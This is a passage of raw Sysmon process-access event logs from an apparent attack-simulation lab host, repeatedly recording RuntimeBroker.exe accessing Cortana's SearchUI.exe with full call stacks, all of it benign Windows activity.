4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245348C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245348C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
